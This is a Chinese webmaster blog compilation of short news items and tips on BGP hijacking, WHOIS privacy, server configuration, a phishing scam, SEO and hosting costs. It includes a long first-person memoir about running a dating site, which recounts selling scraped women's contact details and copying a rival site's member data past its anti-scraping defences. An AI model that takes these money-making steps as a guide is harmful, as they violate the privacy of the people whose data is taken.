anchor)的方法。”Madory还特别指出,这不是推特头一次成为目标了:“这是去年缅甸政变期间被劫持的同一个前缀。”虽然BGP劫持可用于破坏网络或拦截流量,但大多数此类事件是意外事件,比如澳大利亚电讯(Telstra)在2020年宣告自己是其他500个网络的最佳路由。然而,FCC调查公告特别指出,俄罗斯网络之前的行为很可疑。FCC写道:“俄罗斯网络运营商之前被怀疑过利用BGP的漏洞来劫持流量,包括在未给出解释的情况下通过俄罗斯重定向流量。”“比如在2017年末,往返于谷歌、Facebook、苹果和微软的流量曾短暂地通过俄罗斯的一家互联网服务提供商路由传送。同年,来自多家金融机构(包括万事达卡和维萨卡等)的流量也在‘未给出解释’的情况下通过一家俄罗斯政府控制的电信公司路由传送。”虽然RPKI和路由安全相互商定规范(MANRS)倡议解决了这类问题,但采用率比较低,因此FCC的调查旨在想方设法提高BGP保护机制的采用率。 #### 保护隐私:域名WHOIS查询不再公开显示个人信息 个人隐私保护作为当今信息大数据时代众网友所关心的问题,甚至被公开叫板“应建立隐私保护体系作为互联网时代的标配”;一大重要通知:基于隐私考虑,目前域名WHOIS查询已不再显示个人信息! 根据ICANN公布的《通用顶级域名注册数据临时政策细则》和欧盟通用数据保护条例合规要求,全面调整 WHOIS 公开显示的信息。 即:注册商提供WHOIS查询公开信息中将不再显示域名注册人、管理联系人和技术联系人的个人数据,包括姓名、邮箱、电话、街道地址等,只会显示注册商及到期日期等。而且该调整已于2018年5月25日开始生效。 那这个影响并不仅仅局限欧盟地区,例如你用whois看一下自己网站的域名信息,发现已经查不到了... 更有网友亲测发现: 目前从阿里云的万网(不是在阿里云万网注册的域名)已经查不到个人信息了, 百度云有提示(域名注册信息为缓存信息,非实时信息); 站长之家查询域名时,只要一更新缓存,个人信息也不见了; 狗爹的whois查询系统也不显示个人信息了... 由此可见,个人信息保护是从ICANN 的源头开始限制的,只要各个网站的whois查询系统缓存更新以后,个人信息部分就不见了。 估计一大批靠这个保护隐私信息功能吃饭的域名服务商要少了一块肥肉,不过,保护隐私对用户看来还是很有利的。 #### 信息聚合分享应用“抽屉新热榜”宣布关停服务 5 月 26日消息,信息聚合分享应用“抽屉新热榜”近日宣布即将关停服务。 “抽屉”是一款聚合新闻资讯平台,据官方介绍,抽屉新热榜处理的是“人和信息”的关系,目的是在未来发展成为社会化信息聚合平台,向用户高效、友好地提供有趣、热门内容,同时可以让用户分享的资讯、评论得到快速传播。 该平台主要面向用户分享各种热门事件、新闻、娱乐、科技等信息,同时也允许用户发布自己的想法和观点,与其他用户进行交流。 该平台的“热榜”机制分为 24 小时、3 天、一周,排序依据为用户对新闻的点赞数量而非算法。 在关停公告中,官方还透露有许多用户表示“愿意付费甚至捐钱”。 官方还表示,若有可行的救助方案,将想办法与用户取得联系。 抽屉新热榜是国内仅存的聚合新闻资讯平台,里面的内容几乎都是来自第三方平台,也就是说,该网站自己其实并不生产内容,主机吧查了下其SEO流量其实很差。 随着百度搜索政策转变,这类网站能从搜索引擎得到的流量其它低得可怜,靠自主流量的话,又打不过视频网站,所以生存非常困难,想靠收费估计也不现实,谁为了看推送新闻花钱呢? #### 修改Tomcat服务器中的端口配置方法 今天小编就为大家分享一篇修改Tomcat服务中的端口配置方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧 1、修改Tomcat服务中的端口配置: 分别修改安装目录下的conf子目录中的server.xml文件(注意:两个文件中对应的端口号要不一样),修改如下 : a、修改Shutdown端口(默认为8005端口),将8005修改为没有在使用的端口号,例如8055。 <Server port="8005" shutdown="SHUTDOWN" debug="0"> b、修改http访问端口(默认为8080端口),将8080修改为tomcat不在使用的端口号。此处所设的端口号即是以后访问web时所用的端口号。 c、修改8009端口,将8009修改为没有在使用的端口号,例如8099。 以上这篇修改Tomcat服务中的端口配置方法就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多支持主机吧。 #### 修改宝塔IP访问默认页面 有完美主义的站长或者需要更改宝塔直接访问IP的默认页,这里主机吧来分享下如何修改默认页。宝塔面板的默认页面: 修改方法:在面板里 网站管理的地方 你能看到 修改默认页 选择nginx空白页(apache的选择apache空白页)修改保存即可 CTRL+F5刷新网页看效果。 看主机吧就自己修改了默认页,效果还不错。 #### 值得学习:卢松松博客侵权案最新进展:对方已主动撤诉! 如果你说你因为网站几年前的一个评论被人告了,理由是侵权,不信吗? 8月4号国内知道博主卢松松博客就遇到这事,因为几年前有人在他博客上留一条具有知识产权的内容,导致被某公司告了,要求赔偿6000元。 后来经多次协商无果后,卢松松决定应诉,结果对方在开庭的当天撤诉了! 这里有许多需要站长们学习的地方。 卢松松分享了自己在遇到版权官司时的应对流程: 1、收到法院传票不要慌,积极去法院应诉,收集相关材料。 2、对方在开庭前会私聊你,要求给钱和解。这时候一定要拒绝,坚决打官司。 3、积极应诉之后,对方可能不等判决就自动撤诉了,毕竟真正打官司成本太高。如果他们撤诉,就当这事没发生。 4、万一判个几百元,要么不理他们,要么上诉。这事99%也就到此为止,不了了之。 所以后续对于摊上版权这种案的站长和自媒体人可以借鉴下以上处理流程。最后,还是要提醒大家在日常运营网站、自媒体平台时应谨慎,避开版权坑。毕竟处理这类案件耗时耗力。 #### 值得推荐windowsIIS服务器下自动安装免费SSL证书软件 我们都知道windows服务器安装ssl证书挺麻烦的,有些刚接触云服务器的站长根本不知道怎么弄、不过这个问题被国外的大神解决了,他们推出了一款非常简单的在windows IIS环境下自动安装SSL证书。这个软件名叫Certify SSL Manager从letsencrypt.org轻松安装和自动续订IIS服务器的免费SSL / TLS证书。设置https从未如此简单。SSL证书由Let's Encrypt提供支持。Certify 是一个可以自动续订 Let’s Encrypt 颁发证书的第三方 GUI 软件(图形界面工具),使用它可以自动配置、创建和自动续订证书,并且到快要续订的时候会自动发邮件通知我们。 官网地址:https://certifytheweb.com/ 使用时,首先将Certify下载到服务器上并安装。注意其依赖 Microsoft .NET Framework 4.5,Windows 2012 R2默认安装.NET 4.5,Windows 2008 R2等低版本安装时会提示。 第一次启动程序时会弹出对话框让我们填写个邮箱地址,等证书快要过期的时候我们会收到续订证书的提醒邮件。这里我们填上常用的 email 地址,注意这里不认QQ的数字前缀邮箱。进入以后,全部图形化界面,操作很简单,流程如下:点击“新建证书”按钮,certify 会自动扫描 IIS 中的站点,选择我们要申请证书的域名。完毕后点击“保存”按钮进行保存。保存后点击“请求证书”按钮获取证书。在申请的同时,Certify 会在网站根目录下生成 .well-known 文件夹(我们可以稍后把这个目录给删掉,以保持网站目录干净。),并自动配置 web.config,自动验证证书。完全不用我们干预。待其执行完毕后,返回 Certify 的首页面可以看到站站点已经成功使用了 Let’s Encrypt 的证书了。有一点需要注意,免费版的Certify只支持5个站点。证书获取之后,还有一件重要的事情,就是限制只允许HTTPS访问(如下图),同时要在IIS设置HTTP自动转向到HTTPS,这块内容请自行搜索,特别是针对C#.NET应用,web.config就能搞定,URL重写都不用,也不用改403的javascript自动转向。 #### 值得推荐的免费国内虚拟主机 2011年以前免费虚拟主机火了几年,那时候国内还没有强制备案,提供免费虚拟主机的服务商很多,单国内就几十家,小编我也是用免费虚拟主机过来的。 如虎翼(前几年关了)、主机屋都用过,那段时间免费主机一般只是用来玩玩的,因为免费主机都会强制要求你插他们的广告,而且还非常不稳定。 后来小编慢慢的转用了收费的虚拟主机,确实也能深刻体会到免费与收费的区别。现在好多了,因为国内的服务商管理都很严,有能力提供免费虚拟主机的,基本很少了。 今天我们来推荐一家提供免费虚拟主机的服务商-景安网络,景安网络提供1G的国内备案虚拟主机。速度方面一般,但稳定性还不错,值得手上没有钱的个人站长、学生使用。 地址:https://www.zzidc.com/vhost/detail/1645-0-15816.html 支持语言:PHP 5.2/5.3/5.4/5.5/5.6/7.1、html、CGI、伪静态 ASP、html、.net2.0/3.5/4.0 产品名称: 免费主机 操作系统 : windows/linux 内网IP地址: 共享IP 空间大小 1G 月流量: 20G 域名绑定数量 : 10 带宽: 2M   最后温馨提示下,如果真心想做网站赚钱的,建议用收费主机哦,毕竟免费的网络速度真的一般,对站长来说,时间就是金钱。 #### 假期回来可能会让破产的云产品 今年国庆中秋节,很多企业都放了长假,互联网业务也就很长一段时间没人管了,这对于一些业务来说是非常危险的,因为一不小心国庆放假回来,你的云业务可能出现高额的欠款。 比如下面这位站长,使用了腾讯机器翻译,一晚就欠费3000多。 而主机吧也曾经有使用腾讯云的EdgeOne产品,10分钟,欠费500多块钱,只因网站遭遇大量CC攻击,而且网站开了智能加速,在被CC攻击后,网站产生的请求全算进费用里了,实在太吓人! 还有一些后付费的CDN产品,比如腾讯云CDN、阿里云CDN、百度云CDN之类的后付费CDN,黑客最喜欢放长假的时候对网站进行攻击,因为这个时候网站是没有人管理的,这些CDN被攻击后会产生大量的流量费,导致CDN用户欠巨额费用。 当然,对于这些问题,我们可以做帐户欠费策略,比如帐户欠费多少,帐户上的业务自动停止之类的,不过一般都是有时间延迟,对于被攻击瞬间产生的大量费用,几乎无解。 所以我们在使用那些云服务的时候,一定要看好收费模式,最好选择那些预付费的产品。 #### 假!扫码领“五险一金补贴”却跳转到假冒财政部网站 4 月 13 日消息,据央视新闻报道,近日,有部分群众反映收到了领取“五险一金补贴”的通知。该通知声称:“按照人社部相关规定,凡入职满一个月,并按照国家规定正常缴纳五险一金的员工均有资格申请‘五险一金’补贴,请务必在规定时间内完成信息认证及补齐工作,逾期未办理者将无法享受补贴。” 扫描指定的二维码之后却跳转到了假冒的财政部网站,随即需要输入姓名、身份证号码等个人信息。 对此,人力资源社会保障部表示,从未面向普通群众发放过所谓的“五险一金补贴”,所谓通知为不实信息且涉嫌诈骗,千万别信!这类诈骗往往利用非法途径,获取群众的手机号、微信号或邮箱账号等,然后发送虚假信息,诱导群众扫描二维码或点击链接,进入虚假“官方”小程序或网站,并填写身份证、银行卡、验证码等个人信息,以达到骗取钱财的目的。一旦提交信息,补贴领不到,卡里的钱还会被盗。 除了“五险一金补贴”“社保补贴”,这两年还出现过“经济复苏津贴”“个人劳动补贴”等各种骗局。为了以假乱真,行骗者会伪造部委或地方有关部门网站并设置链接,让大家点击进入填写个人信息。还有的骗子以公司人事部门为名,向员工发送补贴领取邮件,并附上自助办理的二维码。 人力资源社会保障部相关工作人员告诉记者,由人社部门发布的通知,不会让参保人提供银行卡、密码、手机验证码等个人信息。遇到类似情况,一定得多个心眼,千万不能大意。 另外,还有一些群众收到短信提示:“你的社保已出现异常,为避免无法使用,收到通知后请即刻登录 XXX 网站办理登记认证。”如果点击链接,就会出现“人社部网站”,弹出“全国电子社保系统升级,需办理新版电子社保”的提示。 这些信息专门针对老年人,声称“退休人员不赶紧认证就要停发养老金”。这其实都是骗子的圈套。只要点击链接,就会跳转到虚假网站,诱骗办理人填写个人信息。 切记不要随便点击不明链接或拨打不明电话,切勿随意在陌生网站上填写个人信息,更不能按其提示进行转账汇款等操作,防止造成财产损失。 人力资源社会保障部提示大家,关于社保补贴、待遇领取、养老金资格认证等任何问题,都可以向当地社会保险经办部门确认,或拨打 12333 热线咨询。如不慎遭遇网络诈骗,要保存好聊天记录、交易记录等相关证据材料,立即拨打 110 报警求助。 #### 做SEO多久才能看到效果? 我个人提供SEO服务的经历中最常被问到的问题有两个。 第一个是,做SEO能保证关键词排名和流量吗? 回答是,不能。不管网上什么地方什么人说能保证,我都是坚持回答不能,哪怕咨询的人一脸鄙视转身就走。因为我真的不能保证。正确、持久优化,有很大可能性获得排名和流量,但不能保证。即使可能性达到90%,那也不叫保证。 除非跟客户保证“北京新街口SEO公司“这样基本没人搜的无聊查询词。这无异于有人问教练,跟你练百米跑,效果能保证吗?教练回答,我能保证你跑进30秒。估计没有教练会这么回答,但SEO行业就什么情况都有了,你以为没有人做这种词?有的。 效果保证这方面,SEO不能和PPC比,最多和报纸、杂志广告比一比。不过,比PPC有吸引力的是,PPC一停止花钱流量立即没了,正规SEO做到的排名和流量不大可能一停就没。 第二个问题是,做SEO多久能看到效果? 回答是,没准儿。SEO就是这么悲催,不确定性比较大。当然,我会换个委婉些的说法:什么时候见效不能准确预计,因为变量太多,网站历史啦,内容质量啦,网站规模啦,SEO投入多少啦,技术优化执行速度啦,竞争对手情况啦,等等等等,一般来说,优化后需要6个月以上才能看到效果。 有时候并不需要这么久,1、2个月有效果也常见,但问题就在于,每个项目、网站全不一样,说不准,所以还是得尽量让客户有个打持久战的心理预期。 虽然不能准确预计做优化后多久能见到效果,但有人统计了有排名的页面的平均年龄,SEO们可以对多老的页面才会有排名有个大致认识,对SEO多久之后出效果是个很好的参考。对于说服客户也有作用,数据表明,要获得排名,平均就是需要这么长时间。 ahrefs在2017年2月发布了一个帖子:多久才能在Google获得排名?简要介绍一下主要数据。 排名在前面的页面有多老? ahrefs统计了2百万随机关键词的前10个页面,数据如下: 可以看到,排在前10的页面平均是2年以上的页面,越靠前越老,排在第一页的平均存在了将近3年。 排在前10的页面,有将近60%是3年以上的老页面,不到20%是2年的页面,只有22%是不到1年的页面。 那么,1年的页面排名情况如何呢? 数据如下: 可以看到,排到第一的页面中只有1%多一点是1年以下的新页面,排到第10的也只有4%是1年的新页面。 一个页面要花多长时间才能获得 Google排名? ahrefs从他们自己蜘蛛抓的页面数据库中随机选了2百万个一年的页面(蜘蛛1年前发现这些页面),统计这些页面获得的关键词排名,结果如下: 蓝色是获得前10排名的页面,橘黄色是获得第11-100排名,灰色是没有获得任何前100排名。 左侧是所有页面平均数据,右侧第一个是高域名权重(DR是他们自己衡量域名外链权重的一个指标的页面),中间是中等,最右侧是低外链权重的页面。 可以看到,这些1年历史的页面,只有5.7%获得了至少一个关键词的前10排名。域名外链越强,这个比例就越高,新页面获得排名的越多。74.8%的1年新页面基本上没有排名。 然后再看看这5.7%获得了排名的页面,从没有排名到进入前10花了多长时间。 结果如下: 大部分页面花了61-182天,从没有排名到爬进前10,也就是2-6个月。 要注意的是,这个数据不是说新页面花2-6个月做SEO就能进入第一页。这只是那5.7%进入了第一页的页面花的时间,剩下那94.3%根本没进第一页。 按关键词热门程度、查询次数统计这些页面的排名又可以看到这个结果: 越热门、查询量越高的关键词,新页面获得排名的比例越低。查询量每月5万次以上的热门词,只有0.3%的1年新页面获得了第一页排名。 这些新页面获得排名的时间,按关键词热门程度显示: 蓝色是热门词(月查询5万次以上),橘黄色是中等程度词(月查询5千-2万),灰色是冷门词(月查询1千词以下)。 可以看到,在这5.7%获得前10排名的页面中,中等竞争程度的词需要6个月以上,热门词需要8个月以上。同样要注意的是,这是那5.7%获得第一页排名的少量页面花的时间,绝大部分1年新页面根本没有排名。 总结一下: 94.3%的1年新页面没有获得任何排名(10页以后) 5.7%幸运获得排名的页面,要花2-6个月获得排名 5.7%获得排名的页面,要获得热门关键词排名,要花8个月以上时间 你的新网站、新页面,SEO了1年还没得到排名,是不是心情好一点了?因为这是正常的。 #### 做一个普通网站大概需要多少钱? 个人做网站可以赚钱,企业做网站可以宣传公司,那么做一个网站大概多少钱呢? 今天主机吧就来跟大家聊聊,做一个普通网站大概多少钱,建设一个普通的网站需要花费的费用通常包括以下几个方面: 1.域名费用:每年大约需要支付100元左右,目前COM域名的注册续费价格大概75元一年,一些后缀的域名可能便宜些,有些特殊的后缀域名会贵些,普通网站建议用COM、CN域名。 2.服务器费用:一般的网站用虚拟主机即可,一年大概200块钱左右,要求特别高的,用云服务器,一年1000起步。 3.网站程序费用:懂些技术的,可以用互联网上的免费开源程序,一般免费,如果什么都不懂的,买现成的,一般一千元左右,让别人给你搭建,如果需要定制网站功能,模板,会更贵,几千到几万元之间。 4.SSL证书:目前互联网域名都是HTTPS,这是网站部署了SSL证书的表现,没有部署SSL证书的网站会被浏览器提示不安全,所以SSL证书非常必要,SSL证书有免费的,也要收费的,收费几十到几千一年不等,看需求购买。 5.网站安全:网站做起来了,就会被贼盯上,所以我们要提前做好网站安全维护,建议给网站部署CDN服务,比如百度云加速、京东云星盾,一年几百到一千多。 综合考虑,建设一个普通的网站的总费用大约在几千元到几万元之间,具体费用取决于网站的复杂程度、功能需求等因素。需要注意的是,以上费用只是估算,实际费用可能会有所不同。 #### 做下载站的同学小心啦,严打破解软件 最近有不少做下载站的站长都有收到IDC服务商的整改通知,原因是网站中含有破解软件,主机吧看了下,站长论坛上已经有站长反馈了,说明这事是真的。 不过主机吧搜了下,目前百度上破解软件网站大多都是正常的,也可能是大站暂时没有影响到。 这年头做网站不容易啊,经面对各种违规,各种风险,主机吧博客都被网信办要求整改三次了,原因都是有违规内容,挺惨的。 #### 做了22年服务器托管的亿恩科技居然跑去卖华为云服务器了 几年前主机吧曾聊过,未来会有很多中小IDC服务商干不下去了,原因是阿里云腾讯云华为云把云服务器价格打得太低了,挤压了中小云服务商的生存空间。 如今来看,确实很多中小云服务商死了,即使没死的也改做别的产品了,或者依附大厂而活。 主机吧已知的中型服务商基本都给阿里云、腾讯云、华为云打工了,比如华夏名网、景安,美橙互联、耐思尼克、中电云集。 亿恩科技是主机吧一度认为不可能给三大服务商打工的服务商了,结果今天,主机吧发现连亿恩科技都开始代理华为云的云服务器了,真的是时代变了。 亿恩科技可是一家上市公司啊,而且拥有自己数据中心,放在十年前,那是国内一线IDC服务商,现在混成做华为云代理,实在有点惨。 看来云服务时代,传统IDC服务商并没有跟上时代,很多都倒了。 #### 做交友网一年赚80万的经历 互联网界闷声赚大钱的高人多得数不清,80万对他们来说可能仅仅是几天的收入,但是对于广大草根站长来说,年入80万还是比较有诱惑力的。下面说一下我靠交友网站年赚80万的经历。法不禁止即可为,这是中国的现状。我做的就是被列为低俗但法律没有禁止的,情人交友。因为涉嫌“低俗”,我一直都不敢告诉亲人朋友我具体在做什么,幸好他们也都不懂互联网,糊弄糊弄就过去了。 网站是在2009年9月份上线的,在这之前我已经做了整整两年的个人站长,期间做过不下100个网站,几乎各种类型的都尝试过,各种广告联盟也都试过,大多都是白折腾赚不到钱,但是掌握了很多无法言传的经验,后来把这些经验运用到一个健康资讯网站上,靠投放Google Adsense勉强维持生活。交友网站上线的第二天就盈利了,确切的说是有人在网站上消费了。在网站上线之前,我就预料到会在短时间内盈利,但是没想到这么快就实现了。我为什么在网站上线之前就知道一定会盈利呢?这里不得不说一下2007年冬天我的一段经历。2007年做广告公司失败,欠下一大笔债,万般无奈就在百度里搜集了一些兼职女孩的QQ号和照片,做成一个照片单页卖女孩的联系方式,然后在各大聊天室、天涯社区、赶集网狂发广告。为了安全,单页上不敢留我的QQ号,只有一个TQ客服系统。做了一个多月,有两个收获:一是收入三千多块钱,二是发现我是个文字沟通高手,凡是来咨询的人,我几乎都让他们乖乖付钱了,转化率至少90%以上,有的人付钱后发现有些联系方式不准确,又来找我,我居然又让他们加点钱升个级,和平打发掉了。两个月之后,我手中的钱已经够吃饭,就赶紧停掉了,一是觉得危险,二是觉得太缺德。不过,这个行业的市场之大已经不言而喻。所以2009年我决定做情人交友网站的时候,就预料到一定会盈利了。决定做情人交友网站之前,我对交友行业透彻的分析了一下,如果做征婚交友,肯定干不过世纪佳缘,做正规交友,没有吸引力,找不到让用户充值消费的诱惑点,继续2007年做的那种半欺骗半拉皮条性质的,又缺德又违法,绝对不可为。最后决定做情人交友。情人,很暧昧的一种社会关系,现实中找情人的男女越来越多,最最关键的是,据我所知截至2009年9月份,只有一家情人交友网站A,而且这家网站的知名度很低,访问量也很低,也没有任何推广的痕迹,我在这家网站充值加了几个女会员,发现信息都很真实。确定好方向之后,注册了一个过期被删除的备案域名,由于我不会写程序,程序直接就用了discuz!不到一个小时,网站就上线了。用过discuz!的都知道,在后台可以任意添加版块,我把每个版块设置成一个城市,一口气添加了200多个城市,然后从上面提到的那个A网站复制资料到我的网站,再花钱买来联系方式,虽然资料不是用户自己注册的,但至少也不是虚假的。我的盈利模式也很简单,就是把联系方式隐藏,用户充值达到一定积分之后就可以看到。9月12号网站上线,当晚我在北京版块添加了七八个女性会员资料,上海、天津、重庆各添加了三四个,然后就急着去天涯社区发广告,结果第二天就有一个北京的男会员充值了,域名费、空间费赚回来了,这给了我极大的动力,马不停蹄的去添加会员资料、去发广告,网站就这样做起来了。9月份共赚五千多块钱。 手工发广告很累,效果也不佳,我想过在联盟投广告,后来想到站长们在群里交流作弊经验的情景之后,就打消了这个念头。到了10月份,我的高中同学jerry告诉我Google Adwords正在搞活动,申请开户即可获得500元的广告体验金,赶紧申请了一个,账户里果然有500元。不知道是竞争对手少,还是我误打误撞把Google Adwords账户优化到了极致,我把单价定到1毛钱,广告展示率仍然很高,大约半个小时就能点完100元广告费。当时用的第三方支付系统是壹支付,唯一一家即时结算的支付系统,用户在网站充值,资金立即到我的银行卡里,手机短信立马提醒。壹支付选择这种即时结算的方式来拉拢站长,迅速占领了大片市场,好多非法网站都在用壹支付,结果可想而知,好像在2010年7月份的时候受山东枣庄一钓鱼网站的牵连壹支付被关闭了,可怜我两天的收入1万多块钱也没能拿回来。跑题了,回到GG账户,广告上线后,奇迹出现了,我之前没赚过大钱,也没如此轻松的赚过钱,所以,对我来说就是个奇迹,我的手机短信响个不停,银行卡里每隔几分钟就有一笔收入,50元到200元不等。不是自己的钱不心疼,才三天就花光了谷歌送的500元广告费,这三天,会员的充值总额是五千多。再去申请的时候,谷歌的政策已经改了,变成充100返200,也就是自己充值100元,账户里就有300元,这个政策也没持续几天就没有了。我尝到了广告的甜头,就继续在谷歌投放广告。粗略的算了一下,当时的投入和产出比是1:8,投放100块钱的广告费,能有800块的收入。期间被K过好几个账号,直到2011年4月份持续被K之后,我就换了百度推广。百度推广的联盟效果不佳,但是搜索效果很好,就是价格偏高,后台强制性最低价格0.38元,大家都谈什么账户优化,我个人觉得那都是一群没见过鬼硬说鬼吓人的人,账户根本不存在多高深的优化,只要你持续投放广告,每天的广告金额超过500元,单价和排名自然就达到最佳状态了。除了谷歌和百度,我还试过几个小广告联盟,试一个后悔一次,不是骗子就是无赖,都属于一边忽悠广告主的钱,一边跟网站主耍无赖的主儿,当然,他们死得比昙花还快。2010年1月份的时候,新上线的情人交友网站已经有四五家,其中有两家直接照搬我的网站,其他几家是用程序修改的。我有了危机感,因为我用的discuz!是一套论坛程序,缺乏互动性,不适合做交友网站,我的网站充其量算是一个会员资料售卖站。于是我花600元买了一套“仿世纪佳缘”的asp交友程序,买来之后才发现程序本身有很多bug,自己不懂程序,只好将就着用。通过广告来的大部分都是男性,网站上女性会员资料太少,很多男会员不愿充值,我又不得不招聘了两个人专门添加会员资料。资料都来源于我上面提到的A网站,那时候他的VIP会员价格很便宜,我们办了个全站的VIP会员,复制他们资料的同时,也把联系方式“偷”过来了。后来他们的管理员发现之后,针对我们做了好几次防御,比如屏蔽我们的IP;网页无法复制;年龄身高体重使用图片显示;24小时之内查看会员数量不能超过100;晚上8点到上午9点不能升级成为VIP会员;会员照片添加不规则水印等等。这时候,我网站每天的平均收入四千左右。5月份的时候又花4500元买了一套比较完善的交友程序,这样看起来算是“正规”的交友网站了,但是效果反而不如以前了,仔细分析了一段时间,找到原因了:大部分会员很反感复杂的注册选项,有一些年龄大的男会员甚至不会注册,而最初用的discuz!程序注册选项只有用户名、密码、邮箱这三项,不到一分钟就可以搞定;在使用网站的过程中交友程序也比discuz!复杂,愿意花钱的会员才不管什么互动不互动,能直接看到异性会员的联系方式就行。还有很大一部分会员连注册都免了,直接充钱,充完钱来找客服要VIP账号。顺便提一下,为什么会员那么信任我的网站呢,一是网站人气高,每天的新帖子和回复贴都上万,所有人都看得到,二是当时的人真的是求情人若渴,为了找一位异性,敢于赌一把,当然,我网站上会员资料都是真实的,他们没有赌输,而且大部分第二年还接着续费。原因找到了,对症下药,还是恢复使用discuz!。由此得出一个重要结论:只要网站能提供用户想要的有用的内容,用户就会喜欢,跟程序好坏关系不大。我记得有个人专门写文章分析过这个结论,他拿天涯社区做例子,天涯社区比起很多论坛来,程序和界面的确有点“老土”,但是挡不住每天那么多人的访问,原因就在于它里面有丰富的内容,有大家喜欢的内容。 2010年算是交友网站的爆炸年。单说情人交友网站,3月份,B网站上线。这家网站的运营方是一家开发客服系统的公司,这套客服系统在今天的市场占有率也挺高。他们的技术比较牛,直接把A网站copy了一遍,包括数据库,然后把前台界面美化了一下,包装完毕就开始在各大平台疯狂推广,那阵势只能用三个字来形容:真有钱!A网站很快在显要位置贴出公告:近日有不法网站冒充XXX,请会员甄别,本站唯一域名:XXX。在中国,情人交友属于游走在所谓的道德边缘的擦边行为,网站闷声赚钱可以,一旦大张旗鼓的摆上台面,离死就不远了。不知道B网站投了多少钱,也不知道赚了多少钱,没几个月就宣布更换域名了,再没多久,就死翘翘了。这时候,很多个人站长都看到了这块肥肉,B网站一死,立马跳出来几十个山寨版的,当然也没有几个活下来的。截至目前,这一行活下来的网站共有四个,第一个是A网站,现在成了名符其实的老大,不做推广全靠口碑;第二个就是我的网站(现在不属于我了,这是后话);第三个和第四个都是自己开发的程序,三年多一直活跃在百度推广的页面上,他们的域名备案都是企业性质,而且网站SEO做得很棒,一直在百度第一页。其实还有三家也做得不错,只不过他们不打“情人”这张牌,他们分别主打出差交友、中产成熟人士交友、年轻男女私密约会,跟情人交友算是殊途同归吧,反正最终引导的都是男女之间那点事。另外还有一家专做高端人士交友的,宣传理念是“男女互助”,他们的会员也都是真实的,可惜后来多次改版并死掉了。 说了这些“正规”的网站,自然要说说那些虚假钓鱼的。不夸张的说,2010年交友的钓鱼网站不少于1000家。虽然后来倒闭了很多,但是跟风者依然斗志昂扬,并且越做越没有底线,终于把用户都骗怕了。到2011年年初的时候,充值的会员数量急剧下降,跟会员聊,他们都反应担心被骗,说是看到了什么新闻什么报道,交友网站好多骗人的。至此,情人交友的爆炸式发展成为历史,情人交友网站的大好日子也结束了。而征婚网站恰恰在此时纷纷加强了实名认证,用户不但没有流失,反而数量激增,幸运的世纪佳缘也看好时机顺利上市了。2010年靠交友网站我赚了80多万,2011年收入一下子降到不足30万,2012年20万左右,2013年连20万都不到,2014年开展净网活动,百度直接不让开户了,单靠自然流量每个月仅仅几千块钱,尝试买流量,效果也不好,加之受“低俗网站”的压迫,我一直在亲戚朋友面前抬不起头来,一咬牙,就把网站卖了。如今有种重新做人的感觉,偶尔打理一下前几年投资的一点小生意,上上网看看书陪陪家人。进入互联网八年,第一次写自己的感受和见解,只为跟大家分享一下,如有丢人现眼之处,还望各位海涵。以后,我会分享更多实际操作中的东西,如果有至少那么一丁点能给别人带来帮助,也算欣慰了。欢迎各位与我沟通交流。作者:向痛而生 #### 做外贸站喜讯!WordPress宣布全面支持Mastodon等联合平台 10月13日 消息:据国外媒体报道,日前WordPress.com宣布全面支持Mastodon等联合平台,为博客所有者提供更多互动和互联的机会。自动化技术公司Automattic早前收购了一款插件,允许WordPress博客在去中心化社交网络联合平台中关注,这一功能升级已成为现实。 这一消息意味着,现在所有使用开源WordPress软件托管版本的用户都可以连接到联邦宇宙,将他们的博客与Mastodon、Pleroma、Friendica等联合平台相连接。这一插件的引入将使博客所有者有机会吸引更多的关注者,因为他们可以将自己的帖子分享到其他联合平台,并接收从这些平台转化为博客评论的回复,从而创建更具互动性和动态的对话。 除此之外,使用这一插件,博客本身也可以成为用户在联邦宇宙中的个人资料,而不必直接在联合应用程序(如Mastodon)上设置帐户。据网络统计数据显示,Mastodon拥有180万月活跃用户,而整个联邦宇宙的用户总数达到了1330万。 这一变化对于WordPress.com的免费、个人和高级托管网站用户来说都是可行的,只需从博客仪表板的“设置”进入“讨论”部分,然后启用标题为“进入联邦宇宙”的开关即可。 这一举措意味着更多的连接和互动,使WordPress.com博客成为更广泛受众的焦点,为博客作者和读者带来更丰富的体验。 无论是博客作者还是读者,这一新功能都将为他们带来更多的可能性,帮助他们更好地与联合平台互联,分享和讨论内容,为互联网社交互动带来全新的可能性。 这一消息显示了Automattic不断努力提供更好的用户体验,借助技术的力量,让互联网社交更加丰富和多样化。这一功能的推出将使WordPress.com博客在Mastodon和其他联合平台上获得更多的曝光和关注,加强了用户之间的互动和连接,为博客领域带来了一次革命性的变革。 #### 做外贸站的站长注意了!谷歌新规:网站必须支持移动端,仅有PC端不予收录 谷歌搜索最近在国外的站长大会发布新规,要求以后所有网站必须同步支持适配移动端,仅有PC端网站将不被谷歌搜索收录,纳入排名索引! 了解到,在最近举办的2020国外站长大会上,谷歌突然在会上针对网站给出了搜索方面的新规定,新规要求:从“2021年3月份之后,所有网站如果只有PC端,网站所有页面将全部不被谷歌搜索收录,网站所有页面和内容必须支持适配移动端,包括文字、数据、图片、视频等。在推出”移动端搜索优先排名之后,搜索流量再一次向移动端倾斜。 以下是谷歌搜索给出的网站支持移动端的优势: 1.可以加速节省时间,提升用户友好性 2.对设备的匹配性更佳,每个设备都能得到正确的设计,总的开发成本下降 3.兼容性更佳,减少了未来不可见风险 4.更利于Google对网页内容的抓取 针对谷歌搜索新规,有站长表示,随着PC端流量不断向移动动互联网迁徙,PC端网站确实在逐渐失去价值,当年大火的各种论坛,博客,社区网站都开始相继关站就是一种信号,在移动端主导的市场下,网站走向移动端是必然,另外一方面,谷歌搜索引擎已经开始主导搜索排名优先移动端,根据国内搜索引擎的套路跟进也是早晚的事,对于站长们来讲网站适配移动端也是刚需,早做打算! #### 做影视站的又一个站长出事 这年头,个人做影视站的基本都是没有版权的,而没有版权都是非常危险的,原因是国内对影视侵权抓得是非常非常严的,基本上主机帮曾经关注过的稍微大点的没有版权的网站都出事了。这不,今天全球主机论坛里,又一位站长出事了,原因是侵权涉案138万,这个影视站还是站长从别人手里买过来的。 目前,侵权肯定跑不了,还有涉黄,不得进去几年? 人生毁了哈,这里告诫大家千万别涉及违法行业,老老实实做网站。 #### 做网站千万别搞百度小程序(百度小程序的那些坑) 主机吧年初的时候就搞了百度小程序,不过后来主机吧停了。 原因是百度小程序真的没用,应该说是对网站一点用处都没有。虽然百度小程序的收录很猛,但收录的都是小程序的页面,而不是网站的页面,很容易导致网站内容被判定为重复。 